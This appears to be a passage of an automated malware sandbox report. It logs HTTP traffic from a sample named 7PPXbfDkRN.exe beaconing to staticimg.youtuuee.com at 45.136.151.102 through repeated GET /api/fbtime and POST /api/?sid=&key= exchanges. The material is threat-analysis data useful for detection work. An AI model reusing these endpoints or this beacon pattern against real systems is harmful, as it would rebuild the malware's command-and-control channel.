1428 OUT POST /api/?sid=2151013&key=46e6a5a1a8c4f08d053bfa44a82eaf14 HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36 Edg/87.0.664.60Content-Length: 289Host: staticimg.youtuuee.com
Oct 24, 2021 09:46:50.593585968 CEST
1429 IN HTTP/1.1 200 OKServer: nginxDate: Sun, 24 Oct 2021 07:46:50 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: keep-aliveVary: Accept-EncodingX-Powered-By: PHP/7.4.21Data Raw: 63 0d 0a 7b 22 73 74 61 74 75 73 22 3a 33 7d 0d 0a 30 0d 0a 0d 0a Data Ascii: c{"status":3}0
Session ID Source IP Source Port Destination IP Destination Port Process
35 192.168.2.5 49789 45.136.151.102 80 C:\Users\user\Desktop\7PPXbfDkRN.exe
Timestamp kBytes transferred Direction Data
Oct 24, 2021 09:46:50.905320883 CEST
1430 OUT GET /api/fbtime HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36 Edg/87.0.664.60Host: staticimg.youtuuee.com
Oct 24, 2021 09:46:51.051181078 CEST
1430 IN HTTP/1.1 200 OKServer: nginxDate: Sun, 24 Oct 2021 07:46:50 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: keep-aliveVary: Accept-EncodingX-Powered-By: PHP/7.4.21Data Raw: 33 35 0d 0a 7b 22 73 69 64 22 3a 32 31 35 31 30 35 35 2c 22 74 69 6d 65 22 3a 31 36 33 35 30 36 31 36 31 30 2c 22 72 61 6e 64 5f 73 74 72 22 3a 22 6a 54 5a 36 67 79 22 7d 0d 0a 30 0d 0a 0d 0a Data Ascii: 35{"sid":2151055,"time":1635061610,"rand_str":"jTZ6gy"}0
Oct 24, 2021 09:46:51.059366941 CEST
1430 OUT POST /api/?sid=2151055&key=7cebe7828b58fe3eef762f25303a291a HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36 Edg/87.0.664.60Content-Length: 289Host: staticimg.youtuuee.com
Oct 24, 2021 09:46:51.219743013 CEST
1431 IN HTTP/1.1 200 OKServer: nginxDate: Sun, 24 Oct 2021 07:46:51 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: keep-aliveVary: Accept-EncodingX-Powered-By: PHP/7.4.21Data Raw: 63 0d 0a 7b 22 73 74 61 74 75 73 22 3a 33 7d 0d 0a 30 0d 0a 0d 0a Data Ascii: c{"status":3}0
Session ID Source IP Source Port Destination IP Destination Port Process
36 192.168.2.5 49790 45.136.151.102 80 C:\Users\user\Desktop\7PPXbfDkRN.exe
Timestamp kBytes transferred Direction Data
Oct 24, 2021 09:46:51.530956984 CEST
1432 OUT GET /api/fbtime HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36 Edg/87.0.664.60Host: staticimg.youtuuee.com
Oct 24, 2021 09:46:51.677324057 CEST
1432 IN HTTP/1.1 200 OKServer: nginxDate: Sun, 24 Oct 2021 07:46:51 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: keep-aliveVary: Accept-EncodingX-Powered-By: PHP/7.4.21Data Raw: 33 35 0d 0a 7b 22 73 69 64 22 3a 32 31 35 31 30 39 35 2c 22 74 69 6d 65 22 3a 31 36 33 35 30 36 31 36 31 31 2c 22 72 61 6e 64 5f 73 74 72 22 3a 22 75 6e 4a 32 4d 66 22 7d 0d 0a 30 0d 0a 0d 0a Data Ascii: 35{"sid":2151095,"time":1635061611,"rand_str":"unJ2Mf"}0
Oct 24, 2021 09:46:51.685113907 CEST
1433 OUT POST /api/?sid=2151095&key=7c9887cd3cb16aeb568a33c9ccd8c538 HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36 Edg/87.0.664.60Content-Length: 289Host: staticimg.youtuuee.com
Oct 24, 2021 09:46:51.835508108 CEST
1433 IN HTTP/1.1 200 OKServer: nginxDate: Sun, 24 Oct 2021 07:46:51 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: keep-aliveVary: Accept-EncodingX-Powered-By: PHP/7.4.21Data Raw: 63 0d 0a 7b 22 73 74 61 74 75 73 22 3a 33 7d 0d 0a 30 0d 0a 0d 0a Data Ascii: c{"status":3}0
Session ID Source IP Source Port Destination IP Destination Port Process
37 192.168.2.5 49791 45.136.151.102 80 C:\Users\user\Desktop\7PPXbfDkRN.exe
Timestamp kBytes transferred Direction Data
Oct 24, 2021 09:46:52.154023886 CEST
1434 OUT GET /api/fbtime HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36 Edg/87.0.664.60Host: staticimg.youtuuee.com
Oct 24, 2021 09:46:52.302098036 CEST
1435 IN HTTP/1.1 200 OKServer: nginxDate: Sun, 24 Oct 2021 07:46:52 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: keep-aliveVary: Accept-EncodingX-Powered-By: PHP/7.4.21Data Raw: 33 35 0d 0a 7b 22 73 69 64 22 3a 32 31 35 31 31 33 39 2c 22 74 69 6d 65 22 3a 31 36 33 35 30 36 31 36 31 32 2c 22 72 61 6e 64 5f 73 74 72 22 3a 22 72 33 7a 62 39 79 22 7d 0d 0a 30 0d 0a 0d 0a Data Ascii: 35{"sid":2151139,"time":1635061612,"rand_str":"r3zb9y"}0
Oct 24, 2021 09:46:52.310817957 CEST
1435 OUT POST /api/?sid=2151139&key=e095cad2278f925f7e4a191097cfde84 HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36 Edg/87.0.664.60Content-Length: 289Host: staticimg.youtuuee.com
Oct 24, 2021 09:46:52.470722914 CEST
1436 IN HTTP/1.1 200 OKServer: nginxDate: Sun, 24 Oct 2021 07:46:52 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: keep-aliveVary: Accept-EncodingX-Powered-By: PHP/7.4.21Data Raw: 63 0d 0a 7b 22 73 74 61 74 75 73 22 3a 33 7d 0d 0a 30 0d 0a 0d 0a Data Ascii: c{"status":3}0
Session ID Source IP Source Port Destination IP Destination Port Process
38 192.168.2.5 49792 45.136.151.102 80 C:\Users\user\Desktop\7PPXbfDkRN.exe
Timestamp kBytes transferred Direction Data
Oct 24, 2021 09:46:52.784478903 CEST
1437 OUT GET /api/fbtime HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36 Edg/87.0.664.60Host: staticimg.youtuuee.com
Oct 24, 2021 09:46:52.932136059 CEST
1437 IN HTTP/1.1 200 OKServer: nginxDate: Sun, 24 Oct 2021 07:46:52 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: keep-aliveVary: Accept-EncodingX-Powered-By: PHP/7.4.21Data Raw: 33 35 0d 0a 7b 22 73 69 64 22 3a 32 31 35 31 31 37 37 2c 22 74 69 6d 65 22 3a 31 36 33 35 30 36 31 36 31 32 2c 22 72 61 6e 64 5f 73 74 72 22 3a 22 79 79 64 7a 35 63 22 7d 0d 0a 30 0d 0a 0d 0a Data Ascii: 35{"sid":2151177,"time":1635061612,"rand_str":"yydz5c"}0
Oct 24, 2021 09:46:52.938849926 CEST
1437 OUT POST /api/?sid=2151177&key=a71f58dbe888f846ae5846e444e1e656 HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36 Edg/87.0.664.60Content-Length: 289Host: staticimg.youtuuee.com
Oct 24, 2021 09:46:53.089015007 CEST
1438 IN HTTP/1.1 200 OKServer: nginxDate: Sun, 24 Oct 2021 07:46:53 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: keep-aliveVary: Accept-EncodingX-Powered-By: PHP/7.4.21Data Raw: 63 0d 0a 7b 22 73 74 61 74 75 73 22 3a 33 7d 0d 0a 30 0d 0a 0d 0a Data Ascii: c{"status":3}0
Session ID Source IP Source Port Destination IP Destination Port Process
39 192.168.2.5 49793 45.136.151.102 80 C:\Users\user\Desktop\7PPXbfDkRN.exe
Timestamp kBytes transferred Direction Data
Oct 24, 2021 09:46:53.411200047 CEST
1439 OUT GET /api/fbtime HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36 Edg/87.0.664.60Host: staticimg.youtuuee.com
Oct 24, 2021 09:46:53.569130898 CEST
1439 IN HTTP/1.1 200 OKServer: nginxDate: Sun, 24 Oct 2021 07:46:53 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: keep-aliveVary: Accept-EncodingX-Powered-By: PHP/7.4.21Data Raw: 33 35 0d 0a 7b 22 73 69 64 22 3a 32 31 35 31 32 30 39 2c 22 74 69 6d 65 22 3a 31 36 33 35 30 36 31 36 31 33 2c 22 72 61 6e 64 5f 73 74 72 22 3a 22 46 66 78 51 4e 6e 22 7d 0d 0a 30 0d 0a 0d 0a Data Ascii: 35{"sid":2151209,"time":1635061613,"rand_str":"FfxQNn"}0
Oct 24, 2021 09:46:53.582036972 CEST
1440 OUT POST /api/?sid=2151209&key=414c662eb1fa32ce4fe76d6805230a51 HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36 Edg/87.0.664.60Content-Length: 289Host: staticimg.youtuuee.com
Oct 24, 2021 09:46:53.740051985 CEST
1440 IN HTTP/1.1 200 OKServer: nginxDate: Sun, 24 Oct 2021 07:46:53 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: keep-aliveVary: Accept-EncodingX-Powered-By: PHP/7.4.21Data Raw: 63 0d 0a 7b 22 73 74 61 74 75 73 22 3a 33 7d 0d 0a 30 0d 0a 0d 0a Data Ascii: c{"status":3}0
Session ID Source IP Source Port Destination IP Destination Port Process
4 192.168.2.5 49752 45.136.151.102 80 C:\Users\user\Desktop\7PPXbfDkRN.exe
Timestamp kBytes transferred Direction Data
Oct 24, 2021 09:46:16.084330082 CEST
1327 OUT GET /api/fbtime HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36 Edg/87.0.664.60Host: staticimg.youtuuee.com
Oct 24, 2021 09:46:16.232496023 CEST
1327 IN HTTP/1.1 200 OKServer: nginxDate: Sun, 24 Oct 2021 07:46:16 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: keep-aliveVary: Accept-EncodingX-Powered-By: PHP/7.4.21Data Raw: 33 35 0d 0a 7b 22 73 69 64 22 3a 32 31 34 39 33 34 33 2c 22 74 69 6d 65 22 3a 31 36 33 35 30 36 31 35 37 36 2c 22 72 61 6e 64 5f 73 74 72 22 3a 22 75 57 4a 74 4b 61 22 7d 0d 0a 30 0d 0a 0d 0a Data Ascii: 35{"sid":2149343,"time":1635061576,"rand_str":"uWJtKa"}0
Oct 24, 2021 09:46:16.322035074 CEST
1328 OUT POST /api/?sid=2149343&key=522b94416aa18897bef2f92ed75a7b55 HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36 Edg/87.0.664.60Content-Length: 289Host: staticimg.youtuuee.com
Oct 24, 2021 09:46:16.475416899 CEST
1328 IN HTTP/1.1 200 OKServer: nginxDate: Sun, 24 Oct 2021 07:46:16 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: keep-aliveVary: Accept-EncodingX-Powered-By: PHP/7.4.21Data Raw: 63 0d 0a 7b 22 73 74 61 74 75 73 22 3a 33 7d 0d 0a 30 0d 0a 0d 0a Data Ascii: c{"status":3}0
Session ID Source IP Source Port Destination IP Destination Port Process
40 192.168.2.5 49794 45.136.151.102 80 C:\Users\user\Desktop\7PPXbfDkRN.exe
Timestamp kBytes transferred Direction Data
Oct 24, 2021 09:46:54.040618896 CEST
1441 OUT GET /api/fbtime HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36 Edg/87.0.664.60Host: staticimg.youtuuee.com
Oct 24, 2021 09:46:54.190620899 CEST
1442 IN HTTP/1.1 200 OKServer: nginxDate: Sun, 24 Oct 2021 07:46:54 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: keep-aliveVary: Accept-EncodingX-Powered-By: PHP/7.4.21Data Raw: 33 35 0d 0a 7b 22 73 69 64 22 3a 32 31 35 31 32 36 35 2c 22 74 69 6d 65 22 3a 31 36 33 35 30 36 31 36 31 34 2c 22 72 61 6e 64 5f 73 74 72 22 3a 22 49 51 4e 7a 37 6a 22 7d 0d 0a 30 0d 0a 0d 0a Data Ascii: 35{"sid":2151265,"time":1635061614,"rand_str":"IQNz7j"}0
Oct 24, 2021 09:46:54.211215019 CEST
1442 OUT POST /api/?sid=2151265&key=03d3bf4050b9f515c87ca732bd77f2cf HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36 Edg/87.0.664.60Content-Length: 289Host: staticimg.youtuuee.com
Oct 24, 2021 09:46:54.366297960 CEST
1443 IN HTTP/1.1 200 OKServer: nginxDate: Sun, 24 Oct 2021 07:46:54 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: keep-aliveVary: Accept-EncodingX-Powered-By: PHP/7.4.21Data Raw: 63 0d 0a 7b 22 73 74 61 74 75 73 22 3a 33 7d 0d 0a 30 0d 0a 0d 0a Data Ascii: c{"status":3}0
Session ID Source IP Source Port Destination IP Destination Port Process
41 192.168.2.5 49795 45.136.151.102 80 C:\Users\user\Desktop\7PPXbfDkRN.exe
Timestamp kBytes transferred Direction Data
Oct 24, 2021 09:46:54.667601109 CEST
1444 OUT GET /api/fbtime HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36 Edg/87.0.664.60Host: staticimg.youtuuee.com
Oct 24, 2021 09:46:54.817378044 CEST
1444 IN HTTP/1.1 200 OKServer: nginxDate: Sun, 24 Oct 2021 07:46:54 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: keep-aliveVary: Accept-EncodingX-Powered-By: PHP/7.4.21Data Raw: 33 35 0d 0a 7b 22 73 69 64 22 3a 32 31 35 31 33 31 39 2c 22 74 69 6d 65 22 3a 31 36 33 35 30 36 31 36 31 34 2c 22 72 61 6e 64 5f 73 74 72 22 3a 22 52 48 71 65 56 78 22 7d 0d 0a 30 0d 0a 0d 0a Data Ascii: 35{"sid":2151319,"time":1635061614,"rand_str":"RHqeVx"}0
Oct 24, 2021 09:46:54.836503983 CEST
1444 OUT POST /api/?sid=2151319&key=1a5f4c87eb0f37dc049eed9c4db37b02 HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36 Edg/87.0.664.60Content-Length: 289Host: staticimg.youtuuee.com
Oct 24, 2021 09:46:54.991520882 CEST
1445 IN HTTP/1.1 200 OKServer: nginxDate: Sun, 24 Oct 2021 07:46:54 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: keep-aliveVary: Accept-EncodingX-Powered-By: PHP/7.4.21Data Raw: 63 0d 0a 7b 22 73 74 61 74 75 73 22 3a 33 7d 0d 0a 30 0d 0a 0d 0a Data Ascii: c{"status":3}0
Session ID Source IP Source Port Destination IP Destination Port Process
42 192.168.2.5 49796 45.136.151.102 80 C:\Users\user\Desktop\7PPXbfDkRN.exe
Timestamp kBytes transferred Direction Data
Oct 24, 2021 09:46:55.309187889 CEST
1446 OUT GET /api/fbtime HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36 Edg/87.0.664.60Host: staticimg.youtuuee.com
Oct 24, 2021 09:46:55.454819918 CEST
1446 IN HTTP/1.1 200 OKServer: nginxDate: Sun, 24 Oct 2021 07:46:55 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: keep-aliveVary: Accept-EncodingX-Powered-By: PHP/7.4.21Data Raw: 33 35 0d 0a 7b 22 73 69 64 22 3a 32 31 35 31 33 35 39 2c 22 74 69 6d 65 22 3a 31 36 33 35 30 36 31 36 31 35 2c 22 72 61 6e 64 5f 73 74 72 22 3a 22 52 72 41 59 4b 52 22 7d 0d 0a 30 0d 0a 0d 0a Data Ascii: 35{"sid":2151359,"time":1635061615,"rand_str":"RrAYKR"}0
Oct 24, 2021 09:46:55.464891911 CEST
1447 OUT POST /api/?sid=2151359&key=8e5b3dc2ab7f04f2eb1218fc34b05518 HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36 Edg/87.0.664.60Content-Length: 289Host: staticimg.youtuuee.com
Oct 24, 2021 09:46:55.617041111 CEST
1447 IN HTTP/1.1 200 OKServer: nginxDate: Sun, 24 Oct 2021 07:46:55 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: keep-aliveVary: Accept-EncodingX-Powered-By: PHP/7.4.21Data Raw: 63 0d 0a 7b 22 73 74 61 74 75 73 22 3a 33 7d 0d 0a 30 0d 0a 0d 0a Data Ascii: c{"status":3}0
Session ID Source IP Source Port Destination IP Destination Port Process
43 192.168.2.5 49797 45.136.151.102 80 C:\Users\user\Desktop\7PPXbfDkRN.exe
Timestamp kBytes transferred Direction Data
Oct 24, 2021 09:46:55.933140039 CEST
1448 OUT GET /api/fbtime HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36 Edg/87.0.664.60Host: staticimg.youtuuee.com
Oct 24, 2021 09:46:56.081788063 CEST
1449 IN HTTP/1.1 200 OKServer: nginxDate: Sun, 24 Oct 2021 07:46:56 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: keep-aliveVary: Accept-EncodingX-Powered-By: PHP/7.4.21Data Raw: 33 35 0d 0a 7b 22 73 69 64 22 3a 32 31 35 31 33 39 35 2c 22 74 69 6d 65 22 3a 31 36 33 35 30 36 31 36 31 35 2c 22 72 61 6e 64 5f 73 74 72 22 3a 22 68 49 45 52 65 35 22 7d 0d 0a 30 0d 0a 0d 0a Data Ascii: 35{"sid":2151395,"time":1635061615,"rand_str":"hIERe5"}0
Oct 24, 2021 09:46:56.098254919 CEST
1449 OUT POST /api/?sid=2151395&key=908b7d52946ed1fe1b4d90f6042b182f HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36 Edg/87.0.664.60Content-Length: 289Host: staticimg.youtuuee.com
Oct 24, 2021 09:46:56.249144077 CEST
1450 IN HTTP/1.1 200 OKServer: nginxDate: Sun, 24 Oct 2021 07:46:56 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: keep-aliveVary: Accept-EncodingX-Powered-By: PHP/7.4.21Data Raw: 63 0d 0a 7b 22 73 74 61 74 75 73 22 3a 33 7d 0d 0a 30 0d 0a 0d 0a Data Ascii: c{"status":3}0
Session ID Source IP Source Port Destination IP Destination Port Process
44 192.168.2.5 49798 45.136.151.102 80 C:\Users\user\Desktop\7PPXbfDkRN.exe
Timestamp kBytes transferred Direction Data
Oct 24, 2021 09:46:56.575320005 CEST
1451 OUT GET /api/fbtime HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36 Edg/87.0.664.60Host: staticimg.youtuuee.com
Oct 24, 2021 09:46:56.724689960 CEST
1451 IN HTTP/1.1 200 OKServer: nginxDate: Sun, 24 Oct 2021 07:46:56 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: keep-aliveVary: Accept-EncodingX-Powered-By: PHP/7.4.21Data Raw: 33 35 0d 0a 7b 22 73 69 64 22 3a 32 31 35 31 34 32 35 2c 22 74 69 6d 65 22 3a 31 36 33 35 30 36 31 36 31 36 2c 22 72 61 6e 64 5f 73 74 72 22 3a 22 37 34 4e 57 47 71 22 7d 0d 0a 30 0d 0a 0d 0a Data Ascii: 35{"sid":2151425,"time":1635061616,"rand_str":"74NWGq"}0
Oct 24, 2021 09:46:56.739645004 CEST
1451 OUT POST /api/?sid=2151425&key=ac504e0e07f53c6f4b545780dc221950 HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36 Edg/87.0.664.60Content-Length: 289Host: staticimg.youtuuee.com
Oct 24, 2021 09:46:56.894335032 CEST
1452 IN HTTP/1.1 200 OKServer: nginxDate: Sun, 24 Oct 2021 07:46:56 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: keep-aliveVary: Accept-EncodingX-Powered-By: PHP/7.4.21Data Raw: 63 0d 0a 7b 22 73 74 61 74 75 73 22 3a 33 7d 0d 0a 30 0d 0a 0d 0a Data Ascii: c{"status":3}0
Session ID Source IP Source Port Destination IP Destination Port Process
45 192.168.2.5 49799 45.136.151.102 80 C:\Users\user\Desktop\7PPXbfDkRN.exe
Timestamp kBytes transferred Direction Data
Oct 24, 2021 09:46:57.241782904 CEST
1453 OUT GET /api/fbtime HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36 Edg/87.0.664.60Host: staticimg.youtuuee.com
Oct 24, 2021 09:46:57.387552977 CEST
1453 IN HTTP/1.1 200 OKServer: nginxDate: Sun, 24 Oct 2021 07:46:57 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: keep-aliveVary: Accept-EncodingX-Powered-By: PHP/7.4.21Data Raw: 33 35 0d 0a 7b 22 73 69 64 22 3a 32 31 35 31 34 37 31 2c 22 74 69 6d 65 22 3a 31 36 33 35 30 36 31 36 31 37 2c 22 72 61 6e 64 5f 73 74 72 22 3a 22 32 6b 61 45 51 55 22 7d 0d 0a 30 0d 0a 0d 0a Data Ascii: 35{"sid":2151471,"time":1635061617,"rand_str":"2kaEQU"}0
Oct 24, 2021 09:46:57.398885012 CEST
1454 OUT POST /api/?sid=2151471&key=e2e363a560e1822402bad2f0fc58fa96 HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36 Edg/87.0.664.60Content-Length: 289Host: staticimg.youtuuee.com
Session ID Source IP Source Port Destination IP Destination Port Process
46 192.168.2.5 49800 45.136.151.102 80 C:\Users\user\Desktop\7PPXbfDkRN.exe
Timestamp kBytes transferred Direction Data
Session ID Source IP Source Port Destination IP Destination Port Process
47 192.168.2.5 49801 45.136.151.102 80 C:\Users\user\Desktop\7PPXbfDkRN.exe
Timestamp kBytes transferred Direction Data
Session ID Source IP Source Port Destination IP Destination Port Process
48 192.168.2.5 49802 45.136.151.102 80 C:\Users\user\Desktop\7PPXbfDkRN.exe
Timestamp kBytes transferred Direction Data
Session ID Source IP Source Port Destination IP Destination Port Process
49 192.168.2.5 49803 45.136.151.102 80 C:\Users\user\Desktop\7PPXbfDkRN.exe
Timestamp kBytes transferred Direction Data
Session ID Source IP Source Port Destination IP Destination Port Process
5 192.168.2.5 49753 45.136.151.102 80 C:\Users\user\Desktop\7PPXbfDkRN.exe
Timestamp kBytes transferred Direction Data
Oct 24, 2021 09:46:17.334026098 CEST
1329 OUT GET /api/fbtime HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36 Edg/87.0.664.60Host: staticimg.youtuuee.com
Oct 24, 2021 09:46:17.487363100 CEST
1330 IN HTTP/1.1 200 OKServer: nginxDate: Sun, 24 Oct 2021 07:46:17 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: keep-aliveVary: Accept-EncodingX-Powered-By: PHP/7.4.21Data Raw: 33 35 0d 0a 7b 22 73 69 64 22 3a 32 31 34 39 34 32 35 2c 22 74 69 6d 65 22 3a 31 36 33 35 30 36 31 35 37 37 2c 22 72 61 6e 64 5f 73 74 72 22 3a 22 52 79 54 41 42 68 22 7d 0d 0a 30 0d 0a 0d 0a Data Ascii: 35{"sid":2149425,"time":1635061577,"rand_str":"RyTABh"}0
Oct 24, 2021 09:46:17.528027058 CEST
1330 OUT POST /api/?sid=2149425&key=2975b649e6fdf9d69b74a57abb0bc8dd HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36 Edg/87.0.664.60Content-Length: 289Host: staticimg.youtuuee.com
Oct 24, 2021 09:46:17.678673983 CEST
1331 IN HTTP/1.1 200 OKServer: nginxDate: Sun, 24 Oct 2021 07:46:17 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: keep-aliveVary: Accept-EncodingX-Powered-By: PHP/7.4.21Data Raw: 63 0d 0a 7b 22 73 74 61 74 75 73 22 3a 33 7d 0d 0a 30 0d 0a 0d 0a Data Ascii: c{"status":3}0
Session ID Source IP Source Port Destination IP Destination Port Process
50 192.168.2.5 49804 45.136.151.102 80 C:\Users\user\Desktop\7PPXbfDkRN.exe
Timestamp kBytes transferred Direction Data
Session ID Source IP Source Port Destination IP Destination Port Process
51 192.168.2.5 49805 45.136.151.102 80 C:\Users\user\Desktop\7PPXbfDkRN.exe
Timestamp kBytes transferred Direction Data
Session ID Source IP Source Port Destination IP Destination Port Process
52 192.168.2.5 49806 45.136.151.102 80 C:\Users\user\Desktop\7PPXbfDkRN.exe
Timestamp kBytes transferred Direction Data
Session ID Source IP Source Port Destination IP Destination Port Process
53 192.168.2.5 49807 45.136.151.102 80 C:\Users\user\Desktop\7PPXbfDkRN.exe
Timestamp kBytes transferred Direction Data
Session ID Source IP Source Port Destination IP Destination Port Process
54 192.168.2.5 49808 45.136.151.102 80 C:\Users\user\Desktop\7PPXbfDkRN.exe
Timestamp kBytes transferred Direction Data
Session ID Source IP Source Port Destination IP Destination Port Process
55 192.168.2.5 49810 45.136.151.102 80 C:\Users\user\Desktop\7PPXbfDkRN.exe
Timestamp kBytes transferred Direction Data
Session ID Source IP Source Port Destination IP Destination Port Process
56 192.168.2.5 49814 45.136.151.102 80 C:\Users\user\Desktop\7PPXbfDkRN.exe
Timestamp kBytes transferred Direction Data
Session ID Source IP Source Port Destination IP Destination Port Process
57 192.168.2.5 49818 45.136.151.102 80 C:\Users\user\Desktop\7PPXbfDkRN.exe
Timestamp kBytes transferred Direction Data
Session ID Source IP Source Port Destination IP Destination Port Process
58 192.168.2.5 49821 45.136.151.102 80 C:\Users\user\Desktop\7PPXbfDkRN.exe
Timestamp kBytes transferred Direction Data
Session ID Source IP Source Port Destination IP Destination Port Process
